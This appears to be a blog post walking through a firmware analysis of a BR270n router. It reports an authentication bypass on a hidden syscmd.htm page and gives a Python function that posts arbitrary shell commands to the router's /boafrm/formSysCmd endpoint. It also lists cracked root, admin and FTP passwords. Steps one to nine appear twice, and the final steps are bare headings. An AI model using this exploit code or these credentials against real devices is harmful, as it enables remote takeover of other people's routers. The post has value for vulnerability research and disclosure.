Router Ghost - A possiblity of 0day remote analysis & discovery
I discovery a IoT device's vulnerability.
- https://gitlab.com/4r70f74r9371n9/routerghost
This is a proof of concept of remote analysis without buy any device.
And the router exploit.
this is what I am doing:
1. extract the firmware(BR270n_SA_FW_TC_1040.bin) via binwalk
2. write a tool to enumerate file & content string
3. I found some sensitive path:
python ./find.py | grep cmd
./squashfs-root/web/syscmd.htm
or sensitive string in http server
python ./find.py | grep -i cmd
./squashfs-root/bin/boa: /syscmd.htm
4. using browser to browse this page
authetication bypassed & remote shell execution!!
5. and i found etc/shadow:
6. crack with john
root/swetop
ftp/swetop
ftpuser/swetop
admin/swetop
7. i found ftp keyword, and I found some binary in router
#ls -al /bin | grep ftp
-rwxr-xr-x 1 root root 175060 Oct 28 2014 pure-ftpd
8. I found telnet in binary directory (/bin) via web interface
ls -al /bin | grep telnet
lrwxrwxrwx 1 root root 7 Oct 28 2014 telnetd -> busybox
9. by analysis the router web interface
- https://gitlab.com/4r70f74r9371n9/routerghost
This is a proof of concept of remote analysis without buy any device.
And the router exploit.
this is what I am doing:
1. extract the firmware(BR270n_SA_FW_TC_1040.bin) via binwalk
2. write a tool to enumerate file & content string
3. I found some sensitive path:
python ./find.py | grep cmd
./squashfs-root/web/syscmd.htm
or sensitive string in http server
python ./find.py | grep -i cmd
./squashfs-root/bin/boa: /syscmd.htm
4. using browser to browse this page
authetication bypassed & remote shell execution!!
5. and i found etc/shadow:
6. crack with john
root/swetop
ftp/swetop
ftpuser/swetop
admin/swetop
7. i found ftp keyword, and I found some binary in router
#ls -al /bin | grep ftp
-rwxr-xr-x 1 root root 175060 Oct 28 2014 pure-ftpd
8. I found telnet in binary directory (/bin) via web interface
ls -al /bin | grep telnet
lrwxrwxrwx 1 root root 7 Oct 28 2014 telnetd -> busybox
9. by analysis the router web interface
<form action=/boafrm/formSysCmd method=POST name="formSysCmd">
<input type="text" name="sysCmd" value="" size="20" maxlength="500"></td>
<input type="submit" value="Apply" name="apply" onClick='return saveClick()'></td>
<input type="hidden" value="/syscmd.htm" name="submit-url">
10.I can set up the post augument as:
datas = {'apply':'Apply', 'msg':'', 'submit-url':'/syscmd.htm', 'sysCmd':cmd}
write a function:
def SendCommand(ip, cmd):
datas = {'apply':'Apply', 'msg':'', 'submit-url':'/syscmd.htm', 'sysCmd':cmd}
r = requests.post("http://%s/boafrm/formSysCmd" % ip,data=datas)
soup = BeautifulSoup(r.text,'lxml') # windows encoding solution: https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/3259271
data = soup.find('textarea')
return data.text.encode('utf-8','ignore')
11. toolchain analysis:
12. write your c file
13. remote code execution exploit
留言
張貼留言